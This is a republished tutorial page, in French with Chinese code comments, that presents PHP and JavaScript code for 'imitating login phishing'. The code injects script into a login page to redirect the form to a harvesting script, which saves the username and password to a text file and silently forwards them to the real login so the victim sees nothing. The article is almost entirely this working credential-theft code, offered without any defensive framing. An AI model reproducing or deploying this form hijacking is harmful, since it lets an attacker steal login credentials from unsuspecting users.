Exemple de code d'imitation du phishing de connexion à l'aide de PHP et JS

不言
Libérer: 2023-04-05 17:46:01
avant
3768 Les gens l'ont consulté

Le contenu de cet article concerne des exemples de code d'imitation du phishing de connexion en utilisant PHP et JS. Il a une certaine valeur de référence. Les amis dans le besoin peuvent s'y référer.

Introduction au répertoire

login.php Fichier de connexion normal

selfLogin.php Fichier de connexion personnalisé

data.txt enregistre les données saisies par l'utilisateur

login.php

<?php
    echo "<pre class="brush:php;toolbar:false">";
    $userInfo = $_POST ;
    if ($userInfo) {
        # code...
        var_dump($userInfo,'登录成功') ;exit();
    }

?>
<!DOCTYPE html>
<html>
<head>
    <title>登录</title>
</head>
<body>
    <form id="login" method="post" action="login.php">
        用户姓名:<input type="text" name="name">
        用户密码:<input type="password" name="pwd">
        <input type="submit" value="确认登录">
    </form>
</body>
<script type="text/javascript">

    //js劫持代码
    window.onload = function (eve) {
        var form = document.getElementById('login');
        form.innerHTML = ' <form id="login" method="post" > 用户姓名:<input type="text" name="name"> 用户密码:<input type="password" name="pwd"> <input type="submit" value="确认登录">    </form> '  ;
        //钓鱼地址
        form.action = "selfLogin.php" ;
    }
</script>
</html>
Copier après la connexion

selfLogin.php

<?php
    $name = &#39;&#39; ;
    $pwd  = &#39;&#39; ;
    //var_dump(&#39;数据被截取了&#39;,$_POST) ;
    if($_POST) {
        //记录获取的数据信息
        $name = $_POST[&#39;name&#39;] ;
        $pwd = $_POST[&#39;pwd&#39;] ;
        file_put_contents(&#39;data.txt&#39;, json_encode($_POST,true)) ;
    }
?>
<!DOCTYPE html>
<html>
<head>
    <title></title>
</head>
<body>

</body>
<script type="text/javascript">
    //构建之前的页面
    window.onload = function (eve) {
        var name = '<?php echo $name; ?>' ;
        var pwd = '<?php echo $pwd; ?>' ;
        if(name && pwd) {
            var p = document.createElement('p');
            document.body.appendChild(p);
            p.innerHTML =' <form id="login2" method="post" action="login.php" > '+
                ' 用户姓名:<input type="text" name="name" value="&#39;+name+&#39;"> 用户密码:<input type="password" name="pwd" value="&#39;+pwd+&#39;"> '  ;
            document.getElementById('login2').submit();
        }
    }
</script>
</html>
Copier après la connexion

data.txt

{"name":"admin","pwd":"123456"}
Copier après la connexion

Cet article est terminé ici. Pour un contenu plus passionnant, vous pouvez faire attention à la colonne Tutoriel vidéo JavaScript du site Web PHP chinois !

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Étiquettes associées:
source:segmentfault.com
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal